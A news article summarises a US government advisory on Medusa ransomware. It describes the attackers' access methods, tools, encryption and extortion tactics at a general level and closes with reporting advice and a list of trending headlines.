Medusa Ransomware Crisis: 300 Major Organizations Under Siege

The FBI, along with the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing and Analysis Center (MS-ISAC), has issued a serious warning about the Medusa ransomware. This cyberattack has already compromised over 300 organizations that provide essential services, including hospitals, schools, law firms, insurance companies, technology firms, and manufacturers.

Medusa is a type of ransomware-as-a-service (RaaS), which means that different cybercriminals can use it to launch attacks while its creators manage key aspects like ransom negotiations. The attackers use a “double extortion” strategy. First, they lock victims out of their own files by encrypting them. Then, they threaten to release the stolen data publicly if the victim does not pay the ransom. This method puts immense pressure on organizations to meet the hackers’ demands.

How Medusa Ransomware Works

Medusa ransomware first appeared in June 2021 and was originally run by a small group. However, it has since grown into a larger network where different criminals can pay to use it. The FBI’s latest investigation, completed as recently as February 2025, has revealed the methods these hackers use to break into computer systems.

Step 1: Getting Inside the System

Hackers working with Medusa often buy access to networks from “initial access brokers” (IABs). These brokers gain entry into a system by tricking employees through fake emails (phishing attacks) or by taking advantage of software weaknesses that have not been fixed. Two major security flaws that Medusa has been using are:

  • CVE-2024-1709 – A security gap in ScreenConnect that allows attackers to bypass authentication.
  • CVE-2023-48788 – A weakness in Fortinet EMS that lets hackers sneak in using SQL injection attacks.

Step 2: Spying and Spreading Inside the Network

Once inside, Medusa’s operators try to blend in with normal computer activity. They use common Windows tools like PowerShell and the Command Prompt to avoid raising suspicion. To gather information about the system, they use software such as:

  • Advanced IP Scanner
  • SoftPerfect Network Scanner

Hackers also install remote access tools like AnyDesk, Atera, and ConnectWise. These programs help them stay inside the network for long periods without being noticed. Using Remote Desktop Protocol (RDP) and a tool called PsExec, they move across different computers within the organization.

One particularly dangerous trick they use is Mimikatz, a tool that steals passwords stored in the system. This allows them to gain full access to important accounts, making it easier to take over the entire network.

Step 3: Stealing and Locking Data

Before locking files, Medusa’s attackers steal sensitive data using Rclone, a program that copies files to cloud storage. Then, they deploy a file-encrypting program called gaze.exe, which:

  • Encrypts all files with strong AES-256 encryption and adds a .medusa extension to them.
  • Shuts down key services like backups, security programs, and database systems to prevent recovery.
  • Deletes shadow copies (automatic backups made by Windows), making it impossible to restore files without the decryption key.

After the encryption process, the hackers give victims 48 hours to respond. They force organizations to negotiate using Tor-based live chat or Tox messenger, which are anonymous communication platforms. If victims ignore them, the hackers go one step further and call or email them directly to demand payment.

Medusa Ransomware: How Cybercriminals Exploit Vulnerabilities

Medusa operators maintain a secret website on the dark web, where they list their victims and show countdown timers that indicate when stolen data will be released. This puts extra pressure on organizations to pay. In some cases, even after victims pay the ransom, another criminal might claim that the first payment was stolen. These hackers then demand more money for the “real” decryption key, showing just how untrustworthy these ransom deals can be.

The FBI, CISA, and MS-ISAC strongly advise against paying ransom. There is no guarantee that victims will get their files back, and paying only encourages hackers to continue attacking other organizations. Instead, authorities urge companies to report any incidents immediately to the FBI’s Internet Crime Complaint Center (IC3), local FBI field offices, or CISA’s official reporting system.

Cyberattacks like Medusa ransomware pose a serious threat to public and private sectors. Organizations must stay alert, patch vulnerabilities, and educate employees to prevent falling victim to these increasingly aggressive cybercriminals.

TOP 10 TRENDING ON NEWSINTERPRETATION

Volt Typhoon: Hackers Infiltrate U.S. Utility

A Cyber Breach in Littleton, Massachusetts A small town in...

Telecom Under Siege: Denmark Raises Cyber Threat Level Over China Espionage Risks

Escalating Telecom Cyber Espionage Attempts Denmark’s Centre for Cyber Security...

MassJacker Malware Hijacks Cryptocurrency Transactions

A new and dangerous malware called MassJacker is putting...

Dangerous Malware: KoSpy Spyware Targets Android Users Worldwide

A Dangerous Spyware Hidden in Apps North Korean hacking groups secretly...

Devastating Cyberattack Exposes Sensitive Data of Over 300,000 Patients

Healthcare Systems Under Attack A massive data breach has impacted...

Rising Tourist Taxes in 2025: A Global Shift Towards Sustainable Travel

Tourist taxes are a growing trend in 2025. Many...

Cyberattack Chaos: Elon Musk Blames Ukraine for Devastating X Breach

X, the social media platform formerly known as Twitter,...

The Harsh Reality of Quick Commerce : Rising Costs and Shrinking Profits

Quick Commerce: The Changing Business Model The quick commerce (QC)...

Women-Led Climate Solutions: Breaking Barriers in Sustainability

The role of women in tackling climate change was...

Tech-Driven Pilgrimages: How Mahakumbh Embraces Digital Transformation

Digital Innovations in Religious Services India's spiritual sector is experiencing...

Volt Typhoon: Hackers Infiltrate U.S. Utility

A Cyber Breach in Littleton, Massachusetts A small town in...

Telecom Under Siege: Denmark Raises Cyber Threat Level Over China Espionage Risks

Escalating Telecom Cyber Espionage Attempts Denmark’s Centre for Cyber Security...

MassJacker Malware Hijacks Cryptocurrency Transactions

A new and dangerous malware called MassJacker is putting...

Dangerous Malware: KoSpy Spyware Targets Android Users Worldwide

A Dangerous Spyware Hidden in Apps North Korean hacking groups secretly...

Devastating Cyberattack Exposes Sensitive Data of Over 300,000 Patients

Healthcare Systems Under Attack A massive data breach has impacted...

Rising Tourist Taxes in 2025: A Global Shift Towards Sustainable Travel

Tourist taxes are a growing trend in 2025. Many...

Cyberattack Chaos: Elon Musk Blames Ukraine for Devastating X Breach

X, the social media platform formerly known as Twitter,...

The Harsh Reality of Quick Commerce : Rising Costs and Shrinking Profits

Quick Commerce: The Changing Business Model The quick commerce (QC)...

Related Articles

Popular Categories

error: Content is protected !!